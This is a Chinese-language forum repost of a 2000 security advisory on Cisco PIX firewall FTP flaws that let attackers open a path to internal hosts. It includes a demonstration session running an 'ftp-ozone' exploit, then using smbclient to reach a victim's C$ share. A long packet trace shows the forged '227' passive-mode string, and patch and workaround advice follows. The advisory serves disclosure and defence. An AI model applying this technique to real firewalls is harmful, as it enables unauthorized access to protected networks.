发信人: liwhite(海阔天空)
整理人: firphoenix(2002-02-05 23:17:14), 站内信件
|
CISCO PIX防火墙FTP漏洞允许非法通过防火墙
发布日期: 2000-3-24
更新日期: 2000-3-24
受影响的系统: CISCO Secure PIX Firewall Software version 4.2(5)
CISCO Secure PIX Firewall Software version 4.4(4)
CISCO Secure PIX Firewall Software version 5.0(3)
描述:
------------------------------------------------------------------------
--------
The Cisco Secure PIX Firewall 在处理FTP命令时存在问题,导致恶意用户可以
穿过防火墙
访问内部资源。这里有两个相关漏洞,这两个漏洞都可以用来不经认证就通过防火
墙传输信息.
1.
CISCO PIX防火墙存在被动FTP安全漏洞。如果PIX后面配置了一台DMZ(非军事区
)FTP服务器,
允许由外往内的被动FTP的话,攻击者可以首先发送一个"227 (xxx,xxx,xxx,xx,
prt1,prt2)"
命令的ip包给PIX,FTP服务器将返回一个错误信息,其中会包含"227 (..."字符串
,由于缺
少正确的检查,PIX会误以为FTP服务器正在开始一个被动FTP传输,PIX就会临时得
创建一条联
往内部FTP服务器指定端口(通过prt2指定)的通道,攻击者可以通过这条通道穿越
防火墙访问
到内部FTP主机的任意端口,甚至是低端口或者一些众所周知的端口。
这个问题在于'fixup protocol ftp'设置的问题,如果禁止这条命令,这个漏洞就
会失效。
但是这样将导致从外部连往内部的FTP client不能使用被动FTP。
2.
当防火墙内部的客户浏览外部服务器时,当点击某个链接后,防火墙会将其解释成
两个或者更
多的FTP命令。客户除了执行一个正常的FTP连接外,还会执行另外的几个FTP命令
打开一个特别
的FTP连接,允许恶意用户穿过防火墙访问内部客户资源。
<* 来源: [email protected], [email protected] *>
测试程序:
------------------------------------------------------------------------
--------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面是针对第一个漏洞的攻击分析:
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '..................................................................
.........................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58
2000
boot.ini ASR 279 Mon Mar 13 03:15:07
2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58
2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58
2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58
2000
MSSCE D 0 Tue Mar 7 14:29:57
2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49
2000
ntldr AHSR 156496 Tue Mar 7 11:47:49
2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51
2000
Program Files D 0 Tue Mar 7 11:35:11
2000
RECYCLER DHS 0 Mon Mar 13 09:35:51
2000
TEMP DA 0 Tue Mar 7 14:36:31
2000
WINNT D 0 Tue Mar 7 14:30:05
2000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
-snip--
我们能看到,在执行了攻击程序ftp-zone后,现在我们可以连到目标主机的
139/tcp端口了,
并且可以访问共享目录。
而如果PIX设置了'logging console debug'选项,我们只能看到一个到21端口的连
接:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr
10.1.2.3/21 laddr 192.168.205.2/21
攻击者IP: 10.1.2.4
PIX IP: 10.1.2.3
内部IP: 192.168.205.2
PIX通过NAT将内部主机192.168.205.2的21端口映射到10.1.2.3的21端口上。
下面是通过tcpdump抓到的包,
在第11个包中,我们可以看到触发PIX不安全动作的字符串就是:
"227 (10,1,2,3,0,139)': command not understood."
PIX误以为,现在FTP server正在打开一个被动ftp的连接,目的端口在139,源端口
是任意的。
这证明,PIX在创建一个动态被动FTP连接前,只是检查是否在包的开头包含
"227 (xxx,xxx,xxx,xxx,prt,prt)"字符串。
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
...............................................................
............................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500 '..........................................................
.................................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
------------------------------------------------------------------------
--------
建议:
针对第一个漏洞,Cisco Secure PIX Firewall 5.1(1) 版本已经解决了这个问题
。
临时解决的办法是禁止'fixup protocol ftp',不允许被动FTP服
务。
针对第二个漏洞,Cisco正在着手进行漏洞修补的工作。
--
----
海阔凭鱼跃天高任鸟飞 |
|